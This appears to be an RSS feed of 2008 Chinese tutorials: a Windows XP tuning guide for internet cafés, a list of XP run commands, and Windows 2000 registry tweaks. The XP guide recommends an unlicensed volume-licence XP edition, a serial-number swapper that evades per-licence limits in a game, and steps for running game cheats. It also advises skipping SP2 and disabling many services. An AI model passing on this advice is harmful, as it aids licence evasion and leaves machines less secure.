<?xml version='1.0' encoding='gb2312'?>
<rss version='2.0'>
<channel>
<title>IT梦工场-中国教程中心</title>
<image>
<title>IT梦工场-中国教程中心</title>
<link>http://www.itcourse.org.cn</link>
<url>http://www.itcourse.org.cn/images/logo1.gif</url>
</image>
<description>为您打造中国免费教程的中心，我们的宗旨是:免费教程，教程下载！</description>
<link>http://www.itcourse.org.cn</link>
<language>zh-cn</language>
<docs>IT梦工场-中国教程中心</docs>
<generator>Rss Generator By RSSMaker v1.2</generator>
<item>
<title><![CDATA[WINDOWS_XP优化全攻略]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2564</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:23:32</pubDate>
<description><![CDATA[<P><FONT face=Verdana>Windows XP优化全攻略 </FONT></P><FONT face=Verdana>
<P><BR>    对于网吧经营者来说，操作系统的优劣，与自己的经济收入有着直接的关系。走进一家网吧，看着顺畅运行丰富的游戏资源，而走进另外一家，使用不到三分钟，机器死机重新启动，作为一名顾客，你会选择去哪一家网吧消费。</P>
<P>    网吧的操作系统，与我们日常的家用操作系统不同。对于网吧来说，要保证操作系统运行稳定、运行速度快、抗病毒能力强等特点。同时，我们也要根据网吧的机器配置，合理的选择一款适合自己网吧机器使用的操作系统。</P>
<P> </P>
<P>    第一部分：适合安装Windows XP操作系统的最佳配置</P>
<P>    对于Windows XP这款操作系统来说，占用的系统资源虽然有点大，但由于操作界面美观、运行稳定快速而得到了用户的喜爱。</P>
<P>    适合安装XP的机器配置：</P>
<P>        CPU：800Mhz以上的主频；内存：256MB或以上；硬盘：20G以上。其他硬件没有特殊要求。要想使Windows XP的运行流畅，内存至少是256MB，CPU主频不低于上述的配置就可以了。对于256MB内存的机器和512MB内存的机器，做系统优化的时候，有不同之处，请在阅读时注意。</P>
<P> </P>
<P>    第二部分：Windows XP操作系统的优化</P>
<P>    一、Windows XP安装盘的版本选择</P>
<P>        Windows XP操作系统，除需要安装密钥之外，还需要激活。为了方便我们的使用，我们通常选择使用Windows XP Professional上海市政府VLK版本，这个版本集成了SP1补丁。虽然现在Windows XP有了SP2补丁，但建议网吧不要使用。上海市政府版的XP，在安装时无需输入密钥，自动激活。</P>
<P>    二、Windows XP的安装</P>
<P>    我们以C1·7G/256MB/80G/Geforce MMX  440/Intel845的机器配置为例，简单叙述一下Windows XP的安装优化过程。</P>
<P>         1、硬盘分区</P>
<P>         C盘500MB，用来存放Windows 98的三个系统文件，还有网络克隆的程序，以备网络克隆用。</P>
<P>         D盘2.4G，用来安装Windows XP操作系统。</P>
<P>         E盘74G，用来安装游戏和日常用软件。</P>
<P>         F盘，剩余的空间分配给F盘。</P>
<P>    以上四个分区中，除C盘用FAT32系统外，其他三个分区全部使用NTFS文件系统。</P>
<P>         2、传递Windows 98的系统文件</P>
<P>    硬盘分区结束后，用Windows 98的启动盘启动机器，在DOS提示符下，输入Sys C:命令，将Windows 98的系统文件传递到C盘，以备网络克隆启动用。然后，复制一些必须的文件，如Himem.sys、Emm386.exe等文件到C盘。</P>
<P>         3、安装Windows XP系统：</P>
<P>    用Windows XP安装光盘启动，安装Windows XP操作系统。在选择安装路径时，选择安装在D盘，并使用NTFS文件系统。</P>
<P>    三、驱动程序的安装：</P>
<P>        Windows XP是继Windows2000之后微软开发的另外一款操作系统，这款操作系统支持的硬件更多，功能更全面，更智能。同时，这款操作系统，对硬件系统的要求也较高，特别是驱动程序。由于Windows XP支持更多的硬件，因此，很多硬件的驱动程序是无须安装的。  </P>
<P>        1、主板驱动：Windows XP安装完成后，如果在设备管理器中，没有黄色叹号或者黄色问号的总线型设备，无需安装主板驱动。如果在系统运行中，出现错误，可以尝试安装主板驱动看一下。</P>
<P>        2、硬盘总线驱动：这款硬件的驱动，无需安装。对于使用Intel芯片主板的用户Intel英特尔Application Accelerator应用程序加速器必须安装，这个加速程序对系统提速有一定的作用。</P>
<P>        3、USB总线驱动：在设备管理器中，查看一下USB总线的驱动版本，如果是USB2.0版本的驱动，无需安装，否则，请手动安装USB2.0的驱动程序。</P>
<P>        4、网卡驱动：如果系统能够识别你的网卡，不需要重新安装新的网卡驱动。</P>
<P>        5、声卡驱动：使用AC97声卡的用户，请选择V1.63版本的声卡驱动安装。非AC97声卡用户，请选择相应版本的驱动，并按照上文中的测试标准进行测试，一直到找到适合的驱动程序为止。</P>
<P>        6、显卡驱动：使用Nvidia系列显卡的用户，请根据下表中的相应显卡，选择相应的驱动程序。</P>
<P>    四、Windows XP系统的补丁安装</P>
<P>对于XP的一些补丁程序，我们最好在通过测试的情况下再安装。对于一些防病毒补丁，如冲击波病毒补丁和震荡波补丁，可以根据自己路由器中的安全策略，决定是否安装。</P>
<P>下面是在Windows XP操作系统中，必须安装的一些补丁程序，冲击波补丁、震荡波补丁、IE 6.0 SP1补丁、爱情后门补丁、泡泡堂输入法补丁程序。其他的系统补丁，建议经过测试后安装。</P>
<P>    五、Windows XP系统的优化设置</P>
<P>         1、系统减肥</P>
<P>        A、在各种软硬件安装妥当之后，其实XP需要更新文件的时候就很少了。删除系统备份文件吧：开始→运行→sfc.exe /purgecache 近3xxM。 </P>
<P>        B、删除驱动备份： %windows%\\</P>
<P>        driver cache\\i386目录下的driver.cab文件，通常这些文件是76m。 </P>
<P>          C、如果你没有看help的习惯，所以保留着%windows%\\help目录下的东西对我们来说是一种摆设，都干掉近4xM。 </P>
<P>         D、卸载不常用组件：用记事本修改\\%windows%\\inf\\sysoc.inf，用查找/替换功能，在查找框中输入,hide，（说明：替换的内容是一个逗号加hide，造成不要忘记把，写上，否则不生效）全部替换为空。这样，就把所有的,hide都去掉了，存盘退出后再运行“添加-删除程序就会看见“添加/删除 windows 组件”中多出不少选项；删除掉游戏啊，码表啊等不用的东西。</P>
<P>         E、删除\\windows\\ime下不用的输入法，8xM。</P>
<P>         2、关掉调试器Dr. Watson，运行drwtsn32，把除了“转储全部线程上下文”之外的全都去掉。否则一旦有程序出错，硬盘会响很久，而且会占用很多空间。如果你以前遇到过这种情况，请查找user.dmp文件并删掉，可能会省掉几十M的空间。这是出错程序的现场，对我们没用。另外蓝屏时出现的memory.dmp也可删掉。可在我的电脑/属性中关掉BSOD时的DUMP。</P>
<P>        3、关闭“系统XP自带的还原”，右键“我的电脑”属性中，系统还原。</P>
<P>        4、关闭“休眠支持”：因为休眠功能占的硬碟空间蛮大的, 所以关闭比较好, 控制台→电源选项→休眠(不要打勾)</P>
<P>         5、加快XP网上邻居浏览速度！ </P>
<P>    打开注册表点击到：HKEY_LOCAL_MACHINE/Software/Microsoft/Windows</P>
<P>/CurrentVersion/Explorer/RemoteComputer/NameSpace。分栏出选择键值：{D6277990-4C6A-11CF-87-00AA0060F5BF}，删除下面的没有必要的键值，重新启动后，会发现桌面上少了许多图标。</P>
<P>         6、关掉不必要的服务： </P>
<P>    单击“开始”→“设置”→“控制面板”。双击“管理工具”→“服务”，打开后将看到服务列表，右键单击要配置的服务，然后单击“属性”。在“常规”选项卡上选择自动”、“手动”或“禁用”，其中“自动”表示每次系统启动时，Windows XP都自动启动该服务；“手动”表示Windows XP不会自动启动该服务，而是在你需要该服务时手动启动该服务；而“禁用”则表示不允许启动该服务。在实际配置时，选择“手动”或者“禁用”都可以实现关闭该服务的目的，推荐使用手动功能，这样你随时可以启动一些临时需要的服务。 </P>
<P>    有些服务是Windows XP所必需的，不能关闭，否则将会造成系统崩溃。至于各项服务的功能，我们可以通过双击该服务或将鼠标悬停在该服务名上查看。下面我们就先来看一看这些服务的说明，下面是被我全部禁止的服务： </P>
<P>Alerter：你未连上局域网并且不需要管理警报；</P>
<P>Clipbook：你不需要查看远程剪贴簿的剪贴页面；</P>
<P>distributed link tracking client：若不使用ntfs分区并且没有联入局域网；</P>
<P>distributed transaction coordinator：不需要同时处理多个数据库或者文件系统；</P>
<P>DHCP Client：如果你机器的IP地址是固定IP地址，可禁止；</P>
<P>DNS Client：如果你的机器DNS服务器地址是设置好的，可禁止；</P>
<P>fax service：不用windows 2000发送或者接收传真；</P>
<P>ftp publishing service：你的计算机不做ftp服务器；</P>
<P>iis admin service：你的计算机不做www服务器；</P>
<P>indexing service：你的计算机不提供远程文件索引和快速访问或者没有连上局域网；</P>
<P>internet connection sharing：你不准备用windows 2000做路由服务器，让多人共享一条线路上网；</P>
<P>ipsec policy agent：你未连接到windows 2000的域；</P>
<P>logical disk manager administrative service：你不准备使用磁盘配额； </P>
<P>message queuing：你未连接到windows 2000的域；</P>
<P>messenger：你未连接到windows 2000的域并且不需要管理警报； </P>
<P>net logon：你不想让局域网上的其他用户登录；</P>
<P>netmeeting remote desktop sharing：你不想使用netmeeting远程管理计算机；</P>
<P>network dde：你没有连入局域网； </P>
<P>network dde dsdm：你没有连入局域网；</P>
<P>performance logs and alerts：若不想知道计算机每一秒都干什么；</P>
<P>qos rsvp：你没有使用依赖于qos的程序；</P>
<P>remote access auto connection manager：你不想在程序企图读取网络信息时自动连接到网络；</P>
<P>remote procedure call (rpc) locator:你不需要管理rpc名称服务数据库；</P>
<P>routing and remote access:你的计算机不做路由器；</P>
<P>runas service:你不需要在某一用户下以另外一个用户的身份执行一个程序；</P>
<P>simple mail transport protocol (smtp):你的计算机不做邮件发送服务器；</P>
<P>smart card：你没有智能卡阅读器； </P>
<P>smart card helper：你没有旧式智能卡阅读器；</P>
<P>snmp trap service：你没有连接到windows 2000的域；</P>
<P>tcp/ip netbios helper service：你的计算机不准备让别人共享；</P>
<P>tcp/ip print server：不让你的计算机成为网络打印服务器；</P>
<P>telnet：不想远程控制计算机执行控制台命令；</P>
<P>uninterruptible power supply：没使用ups或ups不支持双向传输信号；</P>
<P>utility manager：不从一个窗口中启动和配置辅助工具；</P>
<P>windows management instrumentation：你不看你的系统管理信息；</P>
<P>world wide web publishing service：你的计算机不做www服务器；</P>
<P>vices.msc 里面有很多服务是没用的，开启只会浪费内存和资源。影响启动速度。关闭里面无关紧要的服务可以加快启动速度，减少负担！</P>
<P>   我优化的系统只保留以下服务：</P>
<P>＊Plug and Play 这个不用我说了！</P>
<P>＊Remote Procedure Call (RPC) -系统核心服务。</P>
<P>＊Windows Audio -　控制着你听到的声音。关了就没声音了！</P>
<P>＊Windows Management Instrumentation - 很重要的服务，是管“服务依靠”的，但关了会出现奇怪的问题。</P>
<P>＊Workstation -很多服务都依靠这个服务，支持联网和打印／文件共享。</P>
<P>＊ Server 支持此计算机通过网络的文件、打印和命名?这个无法给别人共享文件夹！如果你不用可以关了这个！</P>
<P>＊Network Connections 管理“网络和拨号连接”文件夹中的对象?关了这个改ip很麻烦！ </P>
<P>下面三个服务是系统事件通知的相互有关系。关了event log系统无法启动，其他的2个是给event log 返回消息的，可以关，但是系统日志会一直说有错误！不过为了好用，我还是将这几个服务开着。</P>
<P>Sys Event Notification </P>
<P>COM+ event system</P>
<P>Event Log</P>
<P>           7、关闭鼠标阴影</P>
<P>    在“控制面板”中，打开“鼠标”选项，在“指针”菜单中，将“启用鼠标阴影”选项取消就可以了。</P>
<P>         8、修改桌面主题方式</P>
<P>由于Windows XP漂亮的外表，占用了大量的系统资源，为提高计算机的运行速度，可以使用Windows经典桌面主题。在显示器设置中，找到“主题”，将“主题”更改为“Windows经典主题”就可以了。</P>
<P>    六、Windows XP开机相关项目优化</P>
<P>1、缩短等待时间：</P>
<P>运行注册表编辑器，找到 HKEY_LOCAL_MACHINE\\System\\</P>
<P>CurrentControlSet\\Control，将 WaitToKillServiceTimeout 设为：1000或更小。(原设定值：20000）即关闭程序时仅等待1秒。将 HungApp</P>
<P>Timeout 值改为：200( 原设定值：5000），表示程序出错时等待0.5秒。</P>
<P>2、自动关闭停止回应的程序：</P>
<P>打开注册表 HKEY_CURRENT_USER\\Control Panel\\Desktop 键， 将 AutoEndTasks 值设为 1。 ( 原设定值：0 ）</P>
<P>3、MsConfig：大多数朋友都应该熟识MsConfig了，这是一个系统内置的Windows设置工具。点击开始菜单，选择“运行”，然后在录入框中敲入“msconfig”回车。我们要动手脚的是（启动）选项卡，点击它，这个选项卡中显示了Windows启动时运行的所有程序。这里没有一个程序对Windows来说是生死悠关的，所以放心大胆地把不要的去掉。把部分勾勾去掉之后，Windows启动会快些，同时空闲的系统资源也会多出一些。</P>
<P>4、取消XP自带的压缩文件夹工具：</P>
<P>点击开始→运行，敲入： regsvr32 /u zipfldr.dll 。然后回车即可。</P>
<P>5、关闭错误回报：</P>
<P>控制台→系统→进阶→右下角→错误报告→关闭</P>
<P>6、正确取消XP非正常关机磁盘扫描的方法加汉化Win XP磁盘扫描： </P>
<P>只扫描不修复我们在资源管理器中右击任意驱动器名称，选择“属性”，进入“工具”选项卡，单击“开始检查”按钮，可打开如图所示的对话框。如果不勾选任何修复选项，即使是对系统分区的扫描也可以在Windows环境中进行，出现的也都是中文提示。这相当于在“开始→运行”或“命令行提示符”中输入“Chkdsk X:”（X为驱动器盘符代号）。</P>
<P>A、修复参数与选项对应关系</P>
<P>如果在如图所示的扫描对话框中勾选“自动修复文件系统错误”，即相当于为Chkdsk命令添加了“/f ”参数；勾选“扫描并试图修复坏扇区”即相当于加了“/r”参数。其中，“/f ”参数可以修复磁盘上的文件错误；“/r ”参数可以找到坏扇区并恢复可读取的信息。这两项操作都必须锁定磁盘，对于系统分区，由于Windows会占用系统文件，故无法锁定系统所在磁盘，常规下只能在下次重新启动、进入Windows前进行磁盘扫描。如果你将某些系统文件（如虚拟内存）转移到了其它分区，则该分区也不能进行有修复功能的磁盘扫描操作。</P>
<P>B、修复扫描中文化</P>
<P>如果希望对系统分区进行带有修复功能的磁盘扫描时，出现的也都是中文提示的话，则需要在“恢复控制台”中进行。</P>
<P>进入“恢复控制台”，选系统所在分区的序号、输入管理员密码（如果没有，直接回车）后，在命令提示符后面输入“Chkdsk D: /r”即可对D盘进行扫描检查。系统首先会列出卷的序列号，并显示扫描进度的百分比，在扫描结束时，列出该分区的空间总量、可用空间等信息。整个扫描过程始终显示中文提示，够方便吧！</P>
<P>C、参数含义：</P>
<P>Chkdsk [drive] 指定驱动器，如果不指定，默认为系统所在驱动器；</P>
<P>/V 在FAT/FAT32上，显示磁盘上每个文件的完整路径和名称；</P>
<P>/r 查找有问题的扇区，恢复可读信息（隐含/p，即：即使驱动器不在检查范围，也执行扫描检查。该参数不对驱动器作任何更改）。</P>
<P>提示：将故障恢复控制台安装为启动选项的方法是：在 XP 运行时将安装 CD 插入 CD－ROM 驱动器。然后单击“开始→运行”，输入“X＼i386＼winnt32．exe /cmdcons”回车，再按照提示进行操作即可。X代表CD－ROM 驱动器号，也可以是复制到硬盘上的Windows XP安装文件夹路径，如“E＼WinXP”。</P>
<P>7、更改临时文件的位置 </P>
<P>A、系统临时文件：由于系统每天都要产生大量的临时文件，如果一直放在系统盘，会产生大量的磁盘碎片，造成系统速度越来越慢。临时文件的产生，一般是安装软件、解压释放压缩包和上网的时候会产生一些临时文件。而且如果频繁下载的话，也会有大量的临时文件产生。</P>
<P>更改临时文件的存放位置的方法是，右键“我的电脑”，“属性”对话框中，“高级”中的“环境变量”设置。“变量”temp和tmp全部设置为其他盘中，选择“编辑”，然后更改一下路径就可以了。只更改Local Settings\\Temp前面的变量就行了，更改为一个盘符的卷标就可以。下面“系统变量”中还有temp和tmp这两个变量，直接更改成相同的就行了。</P>
<P>B、Internet临时文件，直接右键“Internet Explorer”中的“属性”对话框中，选择“常规”，在“Internet临时文件”选项中，点击设置对话框，选择“移动文件夹”，将Internet临时文件也指向到系统文件临时文件夹的位置就可以了。</P>
<P> </P>
<P>第三部分：Windows XP系统存在的一些问题的解决方法</P>
<P><BR>一、泡泡堂下无法切换输入法的问题</P>
<P>大家都知道，进入泡泡堂游戏后，无法使用快捷键切换输入法。为了解决这个问题，有以下两种方法：</P>
<P>1、安装泡泡堂输入法补丁，下载地址为http://www.txwm.com/Soft/59.html。安装此补丁后，还需要进行下列设置。打开“控制面板”，找到“区域和语言选项”中的“语言”菜单，打开“详细信息”后，我们可以看到图一。打开“语言栏”菜单，关闭高级文字服务，然后</P>
<P>在“键设置”菜单中，设置一下切换输入法的热键就可以了。</P>
<P>2、不安装泡泡堂输入法补丁，直接为每一种输入法定义一个热键。此方法不方便顾客的使用，因此不推荐使用。</P>
<P>二、CS游戏中鼠标加速的问题：</P>
<P>由于Windows XP对鼠标有加速功能，因此在CS游戏中，鼠标的反应过于灵敏，使CS爱好者甚为苦恼。要解决这个问题，可以进行以下两步操作。</P>
<P>第一步：导入禁止鼠标加速注册表</P>
<P>将下面注册表的内容，复制到记事本中，然后保存为一个.reg的文件，导入注册表后就可以了。注册表的内容如下：</P>
<P>Windows Registry Editor Version 5.00　　[HKEY_CURRENT_USER\\Control Panel\\Mouse]　　"SmoothMouseXCurve"=hex:00,00,00,00,00,00,00,00,00,a0,00,00,00,00,00,00,00,40,01,00,00,00,00,00,00,80,02,00,00,00,00,00,00,00,05,00,00,00,00,00,</P>
<P>"SmoothMouseYCurve"=hex:00,00,00,00,00,00,00,00,66,a6,02,00,00,00,00,</P>
<P>00,cd,4c,05,00,00,00,00,00,a0,99,0a,00,00,00,00,00,38,33,15,00,00,00,00,00,</P>
<P>第二步：在CS快捷方式的属性的目标后面加上以下参数-noforcemaccel -noforcemparms –noforcemspd（如图二）。</P>
<P>经过以上两个步骤就可以彻底去掉在XP系统下鼠标加速。还有一点，修该后在XP下玩CS鼠标速度比Win98下要更慢，所以在XP下要达到原来的鼠标速度，必须要调快40%。根据测试，单纯使用第二个步骤也有效，但对于个别鼠标没有作用。</P>
<P>三、Windows XP中退出大型游戏速度慢的问题</P>
<P>对于使用256MB内存的机器来说，使用Windows XP的时候，在退出游戏的时候，有时候出现特别慢的现象。将“性能选项”的“高级”设置更改为如图三所示就可以了。右键单击“我的电脑”属性中，选择“高级”，在“性能”选项中，点“设置”后，出现“性能选项”菜单，点一下“高级”就出现下面的菜单了。</P>
<P>四、红色警戒游戏无法正常联机问题</P>
<P>红色警戒在XP下玩局域网游戏对战时，无法联机。我们进入红色警戒游戏联机界面后，有一个网卡设定，修改一下网卡的IPX内部编号就可以正常联机了。同时，我们也可以通过红警的一个补丁，来完成这个操作，在安装还原软件前，运行一下红色警戒的联机补丁，就万事大吉了。</P>
<P>五、CS反恐无法正常联机的问题</P>
<P>CS游戏，在网吧里是一个经久不衰的经典网络游戏。CS游戏的一个序列号，只能支持五台机器正常联机，由于网吧的系统盘是同一个母盘克隆出来的，全网吧都在使用同一个序列号，这就是无法正常联机的原因。</P>
<P>要解决CS的联机问题，我们可以下载一个CS序列号自动替换器，实现进入CS游戏自动切换序列号，并且不会重复，彻底解决CS无法正常联机的问题。</P>
<P>六、部分外挂无法使用</P>
<P>在Windows XP操作系统中，部分游戏外挂经常无法使用。由于外挂一般是用VB语言编写的，在Windows XP系统中，没有安装VB运行库文件，因此无法正常运行游戏外挂。下载VB运行库文件，安装后就可以正常使用各种游戏外挂程序了。</P>
<P> </P>
<P>第四部分：母盘测试</P>
<P>Windows XP系统盘做好后，要运行测试才能确认母盘是否存在毛病，对于在测试中的问题，及时找出方法解决。</P>
<P>在进入以下测试步骤之前，必须保证机器能够正常运行，而且要保证所有的软件可以正常运行。</P>
<P>一、声卡方面的测试</P>
<P>1、听音乐（在线音乐或者MTV都可以），声音不变态为正常。</P>
<P>2、进入传奇世界测试，在没有关闭声音的情况下，没有卡机为正常。</P>
<P>3、进入语音聊天室，可以正常语音聊天正常。对于部分AC’97的声卡，在以上两步测试中正常，但进入一些语音聊天室时，无法说话，只能听到对方说话。</P>
<P>4、打开音乐，进入CS游戏，如果退出重新返回CS游戏后，CS游戏仍有声音为正常。 </P>
<P>所有的声卡驱动安装完成后，都可以通过这几个步骤进行测试，如果有一项无法通过，则证明此驱动程序不适合该硬件使用。</P>
<P>二、显卡方面的测试</P>
<P>目前主流的机器配置，一般使用Nvidia系列的显卡。如何判断这一款驱动是否为该显卡的优化驱动版本，不能以显卡属性设置中有16位增强色这一选项为依据。我们可以通过以下几个简单的方法进行测试：</P>
<P>1、进入奇迹MU游戏，然后打开聊天对话框，如果输入文字时，屏幕没有频繁的闪动现象为正常。</P>
<P>2、将显卡的垂直同步关闭后，进入CS后，FPS值如果无法稳定在99-100，则该款驱动程序与显卡不适合。</P>
<P>3、进入泡泡堂、传奇世界、天堂Ⅱ、魔兽争霸等对显卡要求高的游戏进行测试，如果不出现卡机为正常。</P>
<P> </P>
<P>第五部分：母盘制作经验总结</P>
<P>一、母盘制作的原则</P>
<P>1、稳定性：系统运行稳定是最关键的一条。网吧的工作时间长，必须保证母盘不能频繁死机。</P>
<P>2、易用性：在制作系统母盘时，一定要充分考虑到顾客的使用习惯及需求。特别是在系统的限制方面，如下载等要根据网吧的具体情况，再进行限制。建议网吧的系统，不要对用户限制太多。</P>
<P>3、安全性：一定要加强防病毒和木马的能力，加载最具优势的杀毒软件，推荐使用诺顿杀毒企业版。在安全性和系统性能方面，宁肯牺牲一点系统性能，也要保证系统的安全。</P>
<P>4、游戏安装：由于各地的网吧消费主体不同，因此需要根据自己的消费群体，制订游戏的安装。游戏不要太多，要培养自己的消费群体，并要起到对顾客的消费引导作用。</P>
<P>二、母盘的测试工作</P>
<P>1、前期测试：母盘制作完毕后，首先要进行前期的测试，主要测试机器中所安装的软件是否正常，然后进入下一阶段的测试。</P>
<P>2、综合测试：按照第四部分的文字叙述，对母盘进行综合测试。特别是对于显卡和声卡方面的测试。做母盘，其实就是选择合理完美的驱动。</P>
<P>3、客户测试：经过上面两个步骤的测试后，请在网吧克隆部分机器，进行客户测试。在这一段时间内，把客户对样机的意见和要求，记录下来，并逐一改进。测试的时间根据用户使用的时间为准，每台机器的测试时间，不能低于7*24个小时的时间。</P>
<P>备注：本文中的部分软件，可以在www.hgjt.net上下载到，请用户自行查找，本文不再提供下载地址。</P>
<P>至此，Windows XP的优化工作已经完成。对于系统中出现的一些问题，不一定涉及全面，如有问题，请大家通过杂志的专家信箱提出！※</P>
<P><BR></FONT> </P>]]></description>
</item>

<item>
<title><![CDATA[WINDOWS_XP系统总命令集合]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2563</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:23:03</pubDate>
<description><![CDATA[<P><FONT face=Verdana>Windows XP系统总命令集合</FONT></P>
<P><FONT face=Verdana>winver---------检查Windows版本 <BR>    wmimgmt.msc----打开windows管理体系结构(WMI) <BR>    wupdmgr--------windows更新程序 <BR>    wscript--------windows脚本宿主设置 <BR>    write----------写字板 <BR>    winmsd---------系统信息 <BR>    wiaacmgr-------扫描仪和照相机向导 <BR>    winchat--------XP自带局域网聊天 <BR>    mem.exe--------显示内存使用情况 <BR>    Msconfig.exe---系统配置实用程序 <BR>    mplayer2-------简易widnows media player <BR>    mspaint--------画图板 <BR>    mstsc----------远程桌面连接 <BR>    mplayer2-------媒体播放机 <BR>    magnify--------放大镜实用程序 <BR>    mmc------------打开控制台 <BR>    mobsync--------同步命令 <BR>   dxdiag---------检查DirectX信息 <BR>    drwtsn32------ 系统医生 <BR>    devmgmt.msc--- 设备管理器 <BR>    dfrg.msc-------磁盘碎片整理程序 <BR>    diskmgmt.msc---磁盘管理实用程序 <BR>    dcomcnfg-------打开系统组件服务 <BR>    ddeshare-------打开DDE共享设置 <BR>    dvdplay--------DVD播放器 <BR>    net stop messenger-----停止信使服务 <BR>    net start messenger----开始信使服务 <BR>    notepad--------打开记事本 <BR>    nslookup-------网络管理的工具向导 <BR>    ntbackup-------系统备份和还原 <BR>    narrator-------屏幕“讲述人” <BR>    ntmsmgr.msc----移动存储管理器 <BR>    ntmsoprq.msc---移动存储管理员操作请求 <BR>    netstat -an----(TC)命令检查接口 <BR>    syncapp--------创建一个公文包 <BR>    sysedit--------系统配置编辑器 <BR>    sigverif-------文件签名验证程序 <BR>    sndrec32-------录音机 <BR>    shrpubw--------创建共享文件夹 <BR>    secpol.msc-----本地安全策略 <BR>    syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码 <BR>    services.msc---本地服务设置 <BR>    Sndvol32-------音量控制程序 <BR>    sfc.exe--------系统文件检查器 <BR>    sfc /scannow---windows文件保护 <BR>    tsshutdn-------60秒倒计时关机命令 <BR>    tourstart------xp简介（安装完成后出现的漫游xp程序） <BR>    taskmgr--------任务管理器 <BR>    eventvwr-------事件查看器 <BR>    eudcedit-------造字程序 <BR>    explorer-------打开资源管理器 <BR>    packager-------对象包装程序 <BR>    perfmon.msc----计算机性能监测程序 <BR>    progman--------程序管理器 <BR>    regedit.exe----注册表 <BR>    rsop.msc-------组策略结果集 <BR>    regedt32-------注册表编辑器 <BR>    rononce -p ----15秒关机 <BR>    regsvr32 /u *.dll----停止dll文件运行 <BR>    regsvr32 /u zipfldr.dll------取消ZIP支持 <BR>   cmd.exe--------CMD命令提示符 <BR>    chkdsk.exe-----Chkdsk磁盘检查 <BR>    certmgr.msc----证书管理实用程序 <BR>    calc-----------启动计算器 <BR>    charmap--------启动字符映射表 <BR>    cliconfg-------SQL SERVER 客户端网络实用程序 <BR>    Clipbrd--------剪贴板查看器 <BR>    conf-----------启动netmeeting <BR>    compmgmt.msc---计算机管理 <BR>    cleanmgr-------垃圾整理 <BR>    ciadv.msc------索引服务程序 <BR>   osk------------打开屏幕键盘 <BR>    odbcad32-------ODBC数据源管理器 <BR>    oobe/msoobe /a----检查XP是否激活 <BR>    lusrmgr.msc----本机用户和组 <BR>    logoff---------注销命令 <BR>    iexpress-------木马捆绑工具，系统自带 <BR>    Nslookup-------IP地址侦测器 <BR>   fsmgmt.msc-----共享文件夹管理器 <BR>    utilman--------辅助工具管理器 <BR>    gpedit.msc-----组策略</FONT></P>]]></description>
</item>

<item>
<title><![CDATA[WIN2000优化技巧]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2562</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:22:36</pubDate>
<description><![CDATA[<P><FONT face=Verdana>Win2000设置技巧</FONT></P>
<P><FONT face=Verdana>许多设置涉及到注册表，请小心操作，注意备份！ </FONT></P>
<P><FONT face=Verdana>    对象为Windows 2000 Professional。 </FONT></P>
<P><FONT face=Verdana>    内存性能优化： </FONT></P>
<P><FONT face=Verdana>    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management 中设置 ClearPageFileAtShutdown=1。 </FONT></P>
<P><FONT face=Verdana>    若内存≥128M，进行如下优化： </FONT></P>
<P><FONT face=Verdana>    DisablePagingExecutive键值设为1：系统正运行的文件被强制保留在内存中而非移入虚拟内存。 </FONT></P>
<P><FONT face=Verdana>    LargeSystemCache键值设为1：Windows 2000使用系统缓存（同Windows 9x中Vcache），使磁盘输入/输出性能有巨大提高。        </FONT></P>
<P><FONT face=Verdana>    系统性能优化： </FONT></P>
<P><FONT face=Verdana>    1. CPU二级缓存 </FONT></P>
<P><FONT face=Verdana>    L2：CPU二级缓存，是CPU的一个组成部分。然而，Windows2000不对二级缓存作出检测 ，需手动设定。 </FONT></P>
<P><FONT face=Verdana>    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\MemoryManagement\SecondLevelDataCache，值（以KB为单位）调整为所用CPU的二级缓存实际大小。 </FONT></P>
<P><FONT face=Verdana>    注：可选用十六进制或十进制，填入大小值应该选十进制。 </FONT></P>
<P><FONT face=Verdana>    2. 修改磁盘缓存 </FONT></P>
<P><FONT face=Verdana>    Windows2000默认的I/O页面文件比较保守。对于不同的内存，采用不同的磁盘缓存是较好的做法。 </FONT></P>
<P><FONT face=Verdana>    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\IoPageLockLimit中，根据内存修改其十六进制值： </FONT></P>
<P><FONT face=Verdana>    64M→1000； </FONT></P>
<P><FONT face=Verdana>    128M→4000； </FONT></P>
<P><FONT face=Verdana>    256M→10000； </FONT></P>
<P><FONT face=Verdana>    512M或更大→40000。 </FONT></P>
<P><FONT face=Verdana>    3. IRQ中断请求 </FONT></P>
<P><FONT face=Verdana>    计算机的每一个主要部件都设IRQ中断号。通过修改每个IRQ请求的优先次序实现优化。这里的优化对象是系统/CMOS实时钟，通过主板来提升性能。 </FONT></P>
<P><FONT face=Verdana>    1）确定需要获得更高的性能的组件。 </FONT></P>
<P><FONT face=Verdana>    2）找到组件正在使用的IRQ中断号。系统属性→硬件→设备管理器→右击待查组件→属性→资源，可以看到设备正在使用的IRQ中断号。记录中断号。 </FONT></P>
<P><FONT face=Verdana>    3）HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\PriorityControl中新建DWORD双字节值IRQ#Priority（#是具体中断号），值设为1。 </FONT></P>
<P><FONT face=Verdana>    4）重新启动。 </FONT></P>
<P><FONT face=Verdana>    建议优化系统CMOS实时钟（IRQ8），改善整块主板的性能。如要撤消优化设置，只要删除设置的注册表键值。 </FONT></P>
<P><FONT face=Verdana>    4. 不加载DLL文件 </FONT></P>
<P><FONT face=Verdana>    浏览器在使用之后往往会有部分DLL文件在内存中驻留一段时间，部分内存会被无用的DLL文件占用。 </FONT></P>
<P><FONT face=Verdana>    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer新建字符值：AlwaysUnloadDLL，值设为1。 </FONT></P>
<P><FONT face=Verdana>    如要去除这项优化，将该键值设为0（或删除键值）。 </FONT></P>
<P><FONT face=Verdana>    注意：该项优化在Windows重新启动后生效。 </FONT></P>
<P><FONT face=Verdana>    5. 删除多余的DLL文件 </FONT></P>
<P><FONT face=Verdana>    Windows2000的System和System32目录下有大量dll文件被系统或应用软件共享。经常安装卸载软件会增加dll垃圾文件，占用硬盘空间，降低系统运行速度。 </FONT></P>
